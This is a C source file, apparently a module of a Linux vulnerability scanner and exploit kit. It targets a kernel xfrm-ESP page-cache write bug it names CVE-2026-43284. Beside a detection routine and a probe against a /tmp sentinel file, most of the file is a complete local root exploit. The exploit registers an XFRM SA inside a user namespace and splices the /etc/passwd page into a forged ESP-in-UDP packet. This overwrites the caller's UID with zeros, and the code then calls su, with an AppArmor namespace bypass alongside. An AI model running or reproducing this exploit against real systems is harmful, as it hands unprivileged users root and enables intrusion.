SKELETONKEY/modules/copy_fail_family/dirtyfrag_esp.c

/*
 * DIRTYFAIL — dirtyfrag_esp.c — Dirty Frag xfrm-ESP variant
 *                                CVE-2026-43284
 *
 * BACKGROUND
 * ----------
 * In Linux, esp_input() runs the AEAD decryption in-place on the
 * incoming skb. Before that, an skb whose payload sits in a frag (i.e.
 * not in the linear head — the case that arises when userspace plants
 * a page via splice()) is supposed to be cloned out into kernel-owned
 * memory by skb_cow_data(). The bug:
 *
 *     if (!skb_cloned(skb)) {
 *         if (!skb_is_nonlinear(skb)) {
 *             nfrags = 1;
 *             goto skip_cow;
 *         } else if (!skb_has_frag_list(skb)) {
 *             nfrags = skb_shinfo(skb)->nr_frags;
 *             nfrags++;
 *             goto skip_cow;          // <-- vulnerable branch
 *         }
 *     }
 *
 * If the skb has frags but no frag_list, esp_input skips the COW and
 * runs in-place AEAD on the user-supplied page. The same authencesn
 * scratch-write that powers Copy Fail then lands at file offset
 * (assoclen + cryptlen) inside that page. The 4 STOREd bytes are
 * `seq_hi` from the SA's replay_esn state, which userspace controls
 * via XFRMA_REPLAY_ESN_VAL on SA registration.
 *
 * Net result: same 4-byte arbitrary-offset write into a page-cache
 * page as Copy Fail, but reachable via the xfrm path *even when
 * algif_aead is blacklisted as a Copy Fail mitigation*.
 *
 * COST: registering an XFRM SA needs CAP_NET_ADMIN, so the attacker
 * must enter a fresh user namespace first. This is allowed by default
 * on most distros except hardened Ubuntu (AppArmor restrict_unprivileged_userns).
 *
 * DETECTION STRATEGY
 * ------------------
 * Precondition-based: we report VULNERABLE when *all* of these hold:
 *   - kernel >= 4.10 (commit cac2661c53f3, 2017-01-17) and not patched
 *   - esp4 module loadable (we don't insmod; rely on autoload)
 *   - unprivileged user namespace creation works
 *
 * Avoiding the actual primitive in detect mode keeps the system
 * undisturbed (no namespaces created in the parent, no encap sockets,
 * no transient SAs). The exploit path runs the full primitive for real.
 *
 * EXPLOIT STRATEGY
 * ----------------
 * Same UID-flip as Copy Fail, but driven through xfrm:
 *
 *   1.  fork() — parent stays in init userns to call su afterwards
 *   2.  child: unshare(CLONE_NEWUSER | CLONE_NEWNET)
 *   3.  child: write deny → /proc/self/setgroups
 *   4.  child: write "0 <real_uid> 1" → /proc/self/uid_map (and gid_map)
 *   5.  child: ioctl SIOCSIFFLAGS to bring lo UP
 *   6.  child: open NETLINK_XFRM, register SA with:
 *               proto=ESP, mode=TRANSPORT, flags=XFRM_STATE_ESN,
 *               alg=authencesn(hmac(sha256),cbc(aes)) (zero keys),
 *               encap=ESPINUDP sport=dport=4500,
 *               replay_esn.seq_hi = "0000"   (the 4 bytes that will land)
 *   7.  child: open udp_recv @ 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP
 *              and udp_send connected to 127.0.0.1:4500
 *   8.  child: pipe(); vmsplice forged ESP wire header (24 bytes) →
 *              splice /etc/passwd at uid_off, len 16 → splice pipe → udp_send
 *   9.  child: recvmsg drives the kernel through the esp_input path,
 *              firing the 4-byte STORE of "0000" into /etc/passwd
 *              at the user's UID offset
 *  10.  child: exits, parent verifies via fresh open of /etc/passwd
 *  11.  parent: execlp("su", username) — PAM checks /etc/shadow on
 *              disk (untouched), gets right password, setuid(0) lands
 *              us at root because the page-cache copy of /etc/passwd
 *              now lists us as UID 0.
 */

#include "dirtyfrag_esp.h"
#include "apparmor_bypass.h"

#include <fcntl.h>
#include <pwd.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/uio.h>

#ifdef __linux__
#include <sys/syscall.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/xfrm.h>
#include <linux/if.h>
#include <sys/ioctl.h>
#endif

/* UDP_ENCAP / UDP_ENCAP_ESPINUDP live in <linux/udp.h>, but that header
 * conflicts with <netinet/udp.h> over `struct udphdr` and we don't
 * actually need the struct. The kernel constants are stable, so we
 * just hard-code them as fallbacks (the #ifndef makes this a no-op if
 * the toolchain happens to expose them already). */
#ifndef UDP_ENCAP
#define UDP_ENCAP             100
#endif
#ifndef UDP_ENCAP_ESPINUDP
#define UDP_ENCAP_ESPINUDP      2
#endif
#ifndef IPPROTO_ESP
#define IPPROTO_ESP            50
#endif

#ifndef __linux__
#define CLONE_NEWUSER 0x10000000
#define CLONE_NEWNET  0x40000000
#define IFF_UP               0x01
#define IFF_RUNNING          0x40
#define SIOCSIFFLAGS     0x8914
struct sockaddr_in { int dummy; };
struct ifreq      { int dummy; };
__attribute__((unused))
static ssize_t splice (int a, void *b, int c, void *d, size_t e, unsigned f)
{ (void)a;(void)b;(void)c;(void)d;(void)e;(void)f; errno=ENOSYS; return -1; }
__attribute__((unused))
static ssize_t vmsplice(int a, const struct iovec *b, unsigned long c, unsigned d)
{ (void)a;(void)b;(void)c;(void)d; errno=ENOSYS; return -1; }
__attribute__((unused))
static int     ioctl  (int a, unsigned long b, ...)
{ (void)a;(void)b; errno=ENOSYS; return -1; }
#else
extern ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out,
                      size_t len, unsigned int flags);
extern ssize_t vmsplice(int fd, const struct iovec *iov, unsigned long nr,
                        unsigned int flags);
#endif

#define ENCAP_PORT 4500
#define ESP_SPI    0xDEADBE10
#define MARKER     "0000"
#define ALG_NAME   "authencesn(hmac(sha256),cbc(aes))"

/* ---------------------------------------------------------------- *
 * Detection
 * ---------------------------------------------------------------- */

df_result_t dirtyfrag_esp_detect(void)
{
    log_step("Dirty Frag — xfrm-ESP variant (CVE-2026-43284) — detection");

    int km = -1, kn = -1;
    if (kernel_version(&km, &kn))
        log_hint("kernel %d.%d.x", km, kn);

    /* The vulnerable branch was introduced in 2017 (cac2661c53f3) and
     * the upstream fix is f4c50a4034e6 (2026-05-07). We can't easily
     * tell whether a particular distro kernel has the backport, so we
     * report based on prereq presence and let the operator decide. */

    /* esp4 / esp6 modules. They autoload on first XFRM SA registration,
     * but we want to know if the build supports them at all. /proc/modules
     * lists currently-loaded; that's a strong positive signal. */
    bool esp4 = kmod_loaded("esp4");
    bool esp6 = kmod_loaded("esp6");
    log_hint("esp4 currently loaded: %s", esp4 ? "yes" : "no");
    log_hint("esp6 currently loaded: %s", esp6 ? "yes" : "no");

    bool userns = unprivileged_userns_allowed();
    log_hint("unprivileged user namespace: %s", userns ? "allowed" : "DENIED");

    if (!userns) {
        log_ok("xfrm-ESP variant unreachable without unprivileged userns");
        log_hint("on Ubuntu, this is the expected hardening — but the RxRPC "
                 "variant of Dirty Frag may still be reachable. Run with "
                 "--check-rxrpc.");
        return DF_PRECOND_FAIL;
    }

    if (!esp4 && !esp6) {
        log_hint("no esp4/esp6 currently loaded; the kernel will autoload them "
                 "on first SA registration. We treat this as still vulnerable.");
    }

    /* On hardened distros (Ubuntu 26.04+) caps are stripped inside the
     * userns even after our bypass — kernel may still have the bug but
     * unprivileged users can't reach it. Report that honestly rather
     * than claiming VULNERABLE. */
    if (apparmor_userns_caps_blocked()) {
        log_ok("LSM-mitigated — kernel may still have the bug but the AppArmor "
               "policy denies CAP_NET_ADMIN inside any unprivileged userns.");
        log_hint("unprivileged exploitation is blocked; real root can still "
                 "reach the kernel bug. Apply the kernel patch as soon as your "
                 "distro ships it.");
        return DF_PRECOND_FAIL;
    }

    if (dirtyfail_active_probes) {
        log_step("--active set: firing v4 ESP-in-UDP trigger against /tmp sentinel");
        df_result_t pr = dirtyfrag_esp_active_probe();
        if (pr == DF_VULNERABLE || pr == DF_OK || pr == DF_PRECOND_FAIL) return pr;
        log_warn("active probe inconclusive — falling back to precondition verdict");
    }

    log_warn("VULNERABLE (preconditions met) — userns + xfrm SA registration "
             "available, kernel within affected window");
    log_warn("apply mainline patch f4c50a4034e6 or your distro's backport");
    log_warn("interim mitigation: `dirtyfail --mitigate` or manually blacklist "
             "esp4/esp6 in /etc/modprobe.d/");
    log_hint("re-run with `--scan --active` for an empirical sentinel-STORE probe");
    return DF_VULNERABLE;
}

/* ---------------------------------------------------------------- *
 * Exploit — only compiled with full bodies on Linux.
 * ---------------------------------------------------------------- */

#ifdef __linux__

/* Write a small string to a /proc file. */
static bool write_proc(const char *path, const char *value)
{
    int fd = open(path, O_WRONLY);
    if (fd < 0) return false;
    ssize_t want = strlen(value);
    ssize_t got  = write(fd, value, want);
    close(fd);
    return got == want;
}

/* ---- Netlink XFRM SA registration --------------------------------- *
 *
 * The XFRM SA registration is built by hand. Each attribute is a 4-byte
 * aligned struct rtattr { u16 rta_len; u16 rta_type; } followed by
 * payload. The total nlmsg length is filled in last.
 *
 * Register an XFRM_MSG_NEWSA carrying our marker in replay_esn.seq_hi.
 */
static bool xfrm_register_sa(int nl, const unsigned char seq_hi[4])
{
    char buf[2048] = {0};
    struct nlmsghdr  *nlh = (struct nlmsghdr  *)buf;
    struct xfrm_usersa_info *usa =
        (struct xfrm_usersa_info *)NLMSG_DATA(nlh);

    nlh->nlmsg_type  = XFRM_MSG_NEWSA;
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
    nlh->nlmsg_seq   = 1;

    /* Selector: src/dst 127.0.0.1, IPv4 */
    usa->sel.daddr.a4 = htonl(0x7f000001);
    usa->sel.saddr.a4 = htonl(0x7f000001);
    usa->sel.family   = AF_INET;
    usa->sel.prefixlen_d = 32;
    usa->sel.prefixlen_s = 32;

    usa->id.daddr.a4  = htonl(0x7f000001);
    usa->id.spi       = htonl(ESP_SPI);
    usa->id.proto     = IPPROTO_ESP;

    usa->saddr.a4     = htonl(0x7f000001);

    usa->lft.soft_byte_limit   = (uint64_t)-1;
    usa->lft.hard_byte_limit   = (uint64_t)-1;
    usa->lft.soft_packet_limit = (uint64_t)-1;
    usa->lft.hard_packet_limit = (uint64_t)-1;

    usa->reqid     = 0x1234;
    usa->family    = AF_INET;
    usa->mode      = XFRM_MODE_TRANSPORT;
    usa->replay_window = 0;       /* SA-level: 0; ESN-level (below): 32 */
    usa->flags     = XFRM_STATE_ESN;

    size_t hdrlen = sizeof(*nlh) + sizeof(*usa);
    size_t attrs  = 0;
    char   *abuf  = buf + hdrlen;

    /*
     * The kernel's xfrm code does NOT accept `authencesn(...)` as a
     * single XFRMA_ALG_AEAD attribute — it's a composition that has
     * to be assembled from separate auth + crypt parts. We register:
     *   XFRMA_ALG_AUTH_TRUNC : hmac(sha256) with 32-byte key, 128-bit ICV
     *   XFRMA_ALG_CRYPT      : cbc(aes)     with 16-byte key
     *
     * The kernel internally wires these into authencesn(hmac(sha256),
     * cbc(aes)) when it sees XFRM_STATE_ESN on the SA.
     */
    {  /* XFRMA_ALG_AUTH_TRUNC */
        struct xfrm_algo_auth *aa;
        unsigned short dlen = sizeof(*aa) + 32;   /* HMAC-SHA256 key */
        struct rtattr *r = (struct rtattr *)(abuf + attrs);
        r->rta_type = XFRMA_ALG_AUTH_TRUNC;
        r->rta_len  = RTA_LENGTH(dlen);
        aa = (struct xfrm_algo_auth *)RTA_DATA(r);
        memset(aa, 0, dlen);
        strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name) - 1);
        aa->alg_key_len   = 32 * 8;   /* bits */
        aa->alg_trunc_len = 128;      /* bits — truncated MAC width */
        attrs += RTA_SPACE(dlen);
    }
    {  /* XFRMA_ALG_CRYPT */
        struct xfrm_algo *ea;
        unsigned short dlen = sizeof(*ea) + 16;   /* AES-128 key */
        struct rtattr *r = (struct rtattr *)(abuf + attrs);
        r->rta_type = XFRMA_ALG_CRYPT;
        r->rta_len  = RTA_LENGTH(dlen);
        ea = (struct xfrm_algo *)RTA_DATA(r);
        memset(ea, 0, dlen);
        strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name) - 1);
        ea->alg_key_len = 16 * 8;
        attrs += RTA_SPACE(dlen);
    }

    /* XFRMA_REPLAY_ESN_VAL — this is where seq_hi rides */
    {
        struct xfrm_replay_state_esn *esn;
        unsigned short dlen = sizeof(*esn) + 4;  /* bmp_len * 4 = 4 */
        struct rtattr *r = (struct rtattr *)(abuf + attrs);
        r->rta_type = XFRMA_REPLAY_ESN_VAL;
        r->rta_len  = RTA_LENGTH(dlen);
        esn = (struct xfrm_replay_state_esn *)RTA_DATA(r);
        memset(esn, 0, dlen);
        esn->bmp_len       = 1;
        esn->oseq          = 0;
        esn->seq           = 100;
        esn->oseq_hi       = 0;
        memcpy(&esn->seq_hi, seq_hi, 4);  /* THE PRIMITIVE INPUT */
        esn->replay_window = 32;
        attrs += RTA_SPACE(dlen);
    }

    /* XFRMA_ENCAP — UDP encapsulation, sport=dport=4500 */
    {
        struct xfrm_encap_tmpl *enc;
        unsigned short dlen = sizeof(*enc);
        struct rtattr *r = (struct rtattr *)(abuf + attrs);
        r->rta_type = XFRMA_ENCAP;
        r->rta_len  = RTA_LENGTH(dlen);
        enc = (struct xfrm_encap_tmpl *)RTA_DATA(r);
        memset(enc, 0, dlen);
        enc->encap_type  = UDP_ENCAP_ESPINUDP;
        enc->encap_sport = htons(ENCAP_PORT);
        enc->encap_dport = htons(ENCAP_PORT);
        enc->encap_oa.a4 = 0;
        attrs += RTA_SPACE(dlen);
    }

    nlh->nlmsg_len = hdrlen + attrs;

    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    if (sendto(nl, buf, nlh->nlmsg_len, 0,
               (struct sockaddr *)&nladdr, sizeof(nladdr)) < 0)
        return false;

    /* Drain ACK */
    char ack[4096];
    ssize_t n = recv(nl, ack, sizeof(ack), 0);
    if (n < (ssize_t)sizeof(struct nlmsghdr)) return false;
    struct nlmsghdr *r = (struct nlmsghdr *)ack;
    if (r->nlmsg_type == NLMSG_ERROR) {
        struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(r);
        if (e->error != 0) {
            log_bad("XFRM_MSG_NEWSA: %s", strerror(-e->error));
            return false;
        }
    }
    return true;
}

/* Bring loopback up inside the new netns. */
static bool bring_lo_up(void)
{
    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s < 0) return false;
    struct ifreq ifr;
    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
    ifr.ifr_flags = IFF_UP | IFF_RUNNING;
    int rc = ioctl(s, SIOCSIFFLAGS, &ifr);
    close(s);
    return rc == 0;
}

/* Trigger esp_input by sending a forged ESP-in-UDP packet whose payload
 * is a page-cache page from `target_path`, planted via splice at
 * `splice_off`. The kernel STORE lands ~14 bytes into the spliced
 * region (the v4 path has no V6_STORE_SHIFT-style offset). */
static bool trigger_store_at(const char *target_path, loff_t splice_off)
{
    /* udp_recv: bound to 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP set so
     * incoming UDP frames are rerouted into xfrm_input -> esp_input. */
    int udp_recv = socket(AF_INET, SOCK_DGRAM, 0);
    if (udp_recv < 0) return false;
    struct sockaddr_in addr = {
        .sin_family = AF_INET,
        .sin_port   = htons(ENCAP_PORT),
        .sin_addr.s_addr = htonl(0x7f000001),
    };
    int reuse = 1;
    setsockopt(udp_recv, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse));
    if (bind(udp_recv, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        log_bad("bind udp_recv: %s", strerror(errno));
        close(udp_recv); return false;
    }
    int encap = UDP_ENCAP_ESPINUDP;
    if (setsockopt(udp_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) {
        log_bad("UDP_ENCAP_ESPINUDP: %s", strerror(errno));
        close(udp_recv); return false;
    }

    /* udp_send: connect to udp_recv. Packets we splice here will arrive
     * at udp_recv via loopback and feed xfrm_input. */
    int udp_send = socket(AF_INET, SOCK_DGRAM, 0);
    if (udp_send < 0) { close(udp_recv); return false; }
    if (connect(udp_send, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        log_bad("connect udp_send: %s", strerror(errno));
        close(udp_recv); close(udp_send); return false;
    }

    /* Build wire ESP header: SPI(4) || seq_no(4) || IV(16) = 24 bytes.
     * IV value doesn't matter — auth check fails after the STORE. */
    unsigned char wire_hdr[24];
    *(uint32_t *)(wire_hdr + 0) = htonl(ESP_SPI);
    *(uint32_t *)(wire_hdr + 4) = htonl(101);  /* seq_no_lo */
    memset(wire_hdr + 8, 0xCC, 16);

    /* Open the target file for splicing. */
    int pfd = open(target_path, O_RDONLY);
    if (pfd < 0) {
        log_bad("open %s: %s", target_path, strerror(errno));
        close(udp_recv); close(udp_send); return false;
    }

    int p[2];
    if (pipe(p) < 0) {
        log_bad("pipe: %s", strerror(errno));
        close(pfd); close(udp_recv); close(udp_send); return false;
    }

    /* vmsplice the wire header into the pipe (24 bytes). */
    struct iovec iov = { .iov_base = wire_hdr, .iov_len = sizeof(wire_hdr) };
    if (vmsplice(p[1], &iov, 1, 0) != (ssize_t)sizeof(wire_hdr)) {
        log_bad("vmsplice header: %s", strerror(errno));
        close(p[0]); close(p[1]); close(pfd);
        close(udp_recv); close(udp_send); return false;
    }
    /* splice 16 bytes of target's page cache from splice_off. */
    loff_t off = splice_off;
    if (splice(pfd, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) {
        log_bad("splice file->pipe: %s", strerror(errno));
        close(p[0]); close(p[1]); close(pfd);
        close(udp_recv); close(udp_send); return false;
    }
    /* splice the whole 40-byte payload from pipe to udp_send. */
    if (splice(p[0], NULL, udp_send, NULL, 24 + 16, SPLICE_F_MOVE) != 40) {
        log_bad("splice pipe->udp: %s", strerror(errno));
        close(p[0]); close(p[1]); close(pfd);
        close(udp_recv); close(udp_send); return false;
    }
    close(p[0]); close(p[1]);

    /* Drive the receive — esp_input runs inline here, performs the
     * scratch-write, and we don't really care about the actual recv
     * data (auth will fail with EBADMSG).
     *
     * The usleep gives the kernel a hard guarantee that the in-place
     * decrypt has finished and the page-cache STORE is visible before
     * we tear down the sockets. On a busy or slow VM, splice() can
     * return before esp_input has actually fired. V4bel's reference
     * exploit uses the same 150ms wait. */
    usleep(150 * 1000);
    unsigned char drain[256];
    (void)recv(udp_recv, drain, sizeof(drain), MSG_DONTWAIT);

    close(pfd);
    close(udp_recv);
    close(udp_send);
    return true;
}

/* Compatibility wrapper for the exploit path: target /etc/passwd. */
static bool trigger_store(off_t passwd_off)
{
    return trigger_store_at("/etc/passwd", passwd_off);
}

__attribute__((unused))
static int run_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid)
{
    if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0) {
        log_bad("unshare: %s", strerror(errno));
        return 1;
    }
    if (!write_proc("/proc/self/setgroups", "deny")) {
        log_bad("setgroups deny: %s", strerror(errno));
        return 1;
    }
    char map[64];
    snprintf(map, sizeof(map), "0 %u 1", (unsigned)real_uid);
    if (!write_proc("/proc/self/uid_map", map)) {
        log_bad("uid_map: %s", strerror(errno));
        return 1;
    }
    snprintf(map, sizeof(map), "0 %u 1", (unsigned)real_gid);
    if (!write_proc("/proc/self/gid_map", map)) {
        log_bad("gid_map: %s", strerror(errno));
        return 1;
    }
    if (!bring_lo_up()) {
        log_bad("bring lo up: %s", strerror(errno));
        return 1;
    }

    int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
    if (nl < 0) {
        log_bad("AF_NETLINK XFRM: %s", strerror(errno));
        return 1;
    }
    struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
    if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
        log_bad("bind netlink: %s", strerror(errno));
        close(nl); return 1;
    }

    if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) {
        close(nl); return 1;
    }
    log_ok("XFRM SA registered with seq_hi='%s'", MARKER);

    if (!trigger_store(passwd_off)) {
        log_bad("trigger failed");
        close(nl); return 1;
    }
    log_ok("ESP-in-UDP trigger fired");

    close(nl);
    return 0;
}

#else  /* __linux__ */
__attribute__((unused))
static int run_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid)
{
    (void)passwd_off; (void)real_uid; (void)real_gid;
    return 1;
}
#endif

/* ---------------------------------------------------------------- *
 * INNER — runs in the AA bypass userns (post-stage 2).
 *
 * No user interaction, no fork, no verify, no su. Just the kernel
 * work: open netlink, register SA, fire splice trigger, exit.
 * The parent (init ns) owns everything else.
 * ---------------------------------------------------------------- */

df_result_t dirtyfrag_esp_exploit_inner(void)
{
#ifdef __linux__
    const char *user = getenv("DIRTYFAIL_TARGET_USER");
    if (!user || !*user) {
        log_bad("inner: DIRTYFAIL_TARGET_USER not set");
        return DF_TEST_ERROR;
    }

    off_t  uid_off; size_t uid_len; char uid_str[16];
    if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
        log_bad("inner: find_passwd_uid_field('%s') failed", user);
        return DF_TEST_ERROR;
    }
    if (uid_len != 4) {
        log_bad("inner: UID '%s' is %zu chars; need 4", uid_str, uid_len);
        return DF_TEST_ERROR;
    }

    int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
    if (nl < 0) {
        log_bad("inner: AF_NETLINK XFRM: %s", strerror(errno));
        return DF_EXPLOIT_FAIL;
    }
    struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
    if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
        log_bad("inner: bind netlink: %s", strerror(errno));
        close(nl);
        return DF_EXPLOIT_FAIL;
    }

    if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) {
        close(nl);
        return DF_EXPLOIT_FAIL;
    }
    log_ok("inner: XFRM SA registered with seq_hi='%s'", MARKER);

    if (!trigger_store(uid_off)) {
        close(nl);
        return DF_EXPLOIT_FAIL;
    }
    log_ok("inner: ESP-in-UDP trigger fired at uid_off=%lld",
           (long long)uid_off);

    close(nl);
    return DF_EXPLOIT_OK;
#else
    log_bad("dirtyfrag_esp_exploit_inner: Linux-only");
    return DF_TEST_ERROR;
#endif
}

/* ---------------------------------------------------------------- *
 * OUTER — runs in init namespace.
 *
 * Prompts the operator, sets env vars, fork → child arms AA bypass
 * and runs the inner. Parent stays in init ns, waits, reads the
 * global page cache to verify, then either:
 *   - do_shell=true: execlp("su", user) — runs in init ns →
 *     PAM reads modified /etc/passwd → uid 0 → real init-ns root
 *   - do_shell=false: try_revert_passwd_page_cache, return.
 * ---------------------------------------------------------------- */

df_result_t dirtyfrag_esp_exploit(bool do_shell)
{
    log_step("Dirty Frag (xfrm-ESP) — exploit");

    uid_t uid = getuid();
    if (uid == 0) {
        log_warn("already root in init namespace — nothing to escalate");
        return DF_OK;
    }
    struct passwd *pw = getpwuid(uid);
    if (!pw) { log_bad("getpwuid: %s", strerror(errno)); return DF_TEST_ERROR; }
    const char *user = pw->pw_name;

    off_t  uid_off; size_t uid_len; char uid_str[16];
    if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
        log_bad("could not find %s in /etc/passwd", user);
        return DF_TEST_ERROR;
    }
    log_step("/etc/passwd UID for %s: '%s' at offset %lld",
             user, uid_str, (long long)uid_off);
    if (uid_len != 4) {
        log_bad("UID '%s' is %zu chars; this technique needs exactly 4",
                uid_str, uid_len);
        return DF_TEST_ERROR;
    }

    log_warn("about to run xfrm-ESP page-cache write against /etc/passwd");
    log_warn("this enters a fresh user/net namespace, registers an XFRM SA, "
             "and sends an ESP-in-UDP packet whose payload is the /etc/passwd "
             "page from offset %lld", (long long)uid_off);
    log_warn("on success the page cache will report '%s' as UID 0", user);
    log_warn("cleanup: dirtyfail --cleanup, or `echo 3 > /proc/sys/vm/drop_caches`");
    if (!typed_confirm("DIRTYFAIL")) {
        log_bad("confirmation declined — aborting");
        return DF_OK;
    }
    if (!ssh_lockout_check(user)) {
        log_bad("SSH-lockout confirmation declined — aborting");
        return DF_OK;
    }

    /* Hand off to the inner via env vars + AA bypass fork.
     *
     * The child fork enters the bypass userns, runs
     * dirtyfrag_esp_exploit_inner (dispatched from main() based on
     * DIRTYFAIL_INNER_MODE), modifies the global page cache, exits.
     * We (parent, init ns) read the result via the same global page
     * cache and execlp(su) here in init ns for REAL root. */
    setenv("DIRTYFAIL_INNER_MODE",   "esp", 1);
    setenv("DIRTYFAIL_TARGET_USER",  user,  1);

    int rc = apparmor_bypass_fork_arm(0, NULL);  /* argc/argv unused for forked variant */
    if (rc != DF_EXPLOIT_OK) {
        log_bad("inner exploit failed (exit=%d)", rc);
        return DF_EXPLOIT_FAIL;
    }

    /* Verify in init namespace — page cache is global, so we see the
     * child's modification here. */
    int v = open("/etc/passwd", O_RDONLY);
    if (v < 0) { log_bad("verify open: %s", strerror(errno)); return DF_EXPLOIT_FAIL; }
    if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; }
    char land[5] = {0};
    if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; }
    close(v);
    if (memcmp(land, MARKER, 4) != 0) {
        log_bad("write did not land — page cache reads '%.4s'", land);
        return DF_EXPLOIT_FAIL;
    }
    log_ok("page cache now reports %s with uid 0", user);

    if (!do_shell) {
        if (try_revert_passwd_page_cache())
            log_ok("page cache reverted (--no-shell)");
        else
            log_warn("page cache may still be modified — `sudo dirtyfail --cleanup` or reboot");
        return DF_EXPLOIT_OK;
    }

    log_ok("invoking 'su %s' in init namespace — enter your password for REAL root", user);
    execlp("su", "su", user, (char *)NULL);
    log_bad("execlp: %s", strerror(errno));
    return DF_EXPLOIT_FAIL;
}

/* ---------------------------------------------------------------- *
 * Active probe — used by `--scan --active`.
 *
 * Same userns + XFRM SA + splice-trigger setup as the exploit, but
 * targets a sentinel file in /tmp instead of /etc/passwd. The parent
 * (init ns) reads the sentinel after the child returns and looks for
 * the marker bytes.
 *
 * If the marker landed → kernel STORE is reachable → DF_VULNERABLE.
 * If the page is intact → kernel is patched → DF_OK.
 * If AA blocks the bypass → DF_PRECOND_FAIL.
 * ---------------------------------------------------------------- */

df_result_t dirtyfrag_esp_active_probe_inner(void)
{
#ifdef __linux__
    const char *sentinel = getenv("DIRTYFAIL_PROBE_SENTINEL");
    if (!sentinel || !*sentinel) {
        log_bad("active-probe: DIRTYFAIL_PROBE_SENTINEL not set");
        return DF_TEST_ERROR;
    }

    int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
    if (nl < 0) {
        log_bad("active-probe: netlink xfrm: %s", strerror(errno));
        return DF_TEST_ERROR;
    }
    struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
    if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
        log_bad("active-probe: bind netlink: %s", strerror(errno));
        close(nl); return DF_TEST_ERROR;
    }
    if (!bring_lo_up()) {
        log_bad("active-probe: bring lo up: %s", strerror(errno));
        close(nl); return DF_TEST_ERROR;
    }
    if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) {
        close(nl); return DF_TEST_ERROR;
    }
    if (!trigger_store_at(sentinel, 0)) {
        close(nl); return DF_TEST_ERROR;
    }
    close(nl);
    return DF_EXPLOIT_OK;
#else
    return DF_TEST_ERROR;
#endif
}

df_result_t dirtyfrag_esp_active_probe(void)
{
    /* Sentinel file: 4 KiB of 'A' bytes. */
    char tmpl[] = "/tmp/dirtyfail-esp-probe.XXXXXX";
    int sfd = mkstemp(tmpl);
    if (sfd < 0) { log_bad("probe mkstemp: %s", strerror(errno)); return DF_TEST_ERROR; }
    unsigned char filler[4096];
    memset(filler, 'A', sizeof(filler));
    if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) {
        close(sfd); unlink(tmpl); return DF_TEST_ERROR;
    }
    close(sfd);

    /* Fault the page in. */
    int rfd = open(tmpl, O_RDONLY);
    if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; }
    char tmp[4096];
    if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) {
        close(rfd); unlink(tmpl); return DF_TEST_ERROR;
    }
    close(rfd);

    setenv("DIRTYFAIL_INNER_MODE",      "esp-probe", 1);
    setenv("DIRTYFAIL_PROBE_SENTINEL",  tmpl,        1);
    int rc = apparmor_bypass_fork_arm(0, NULL);
    unsetenv("DIRTYFAIL_INNER_MODE");
    unsetenv("DIRTYFAIL_PROBE_SENTINEL");

    if (rc == DF_PRECOND_FAIL) { unlink(tmpl); return DF_PRECOND_FAIL; }
    if (rc != DF_EXPLOIT_OK)   {
        log_bad("active-probe inner failed (exit=%d)", rc);
        unlink(tmpl); return DF_TEST_ERROR;
    }

    /* Re-read sentinel and search for marker. */
    rfd = open(tmpl, O_RDONLY);
    if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; }
    unsigned char after[64];
    ssize_t got = read(rfd, after, sizeof(after));
    close(rfd);
    unlink(tmpl);
    if (got <= 0) return DF_TEST_ERROR;

    for (int i = 0; i + 4 <= got; i++) {
        if (memcmp(after + i, MARKER, 4) == 0) {
            log_warn("ACTIVE PROBE: STORE landed at offset %d → kernel is VULNERABLE", i);
            return DF_VULNERABLE;
        }
    }
    log_ok("ACTIVE PROBE: page intact — kernel ESP path appears patched");
    return DF_OK;
}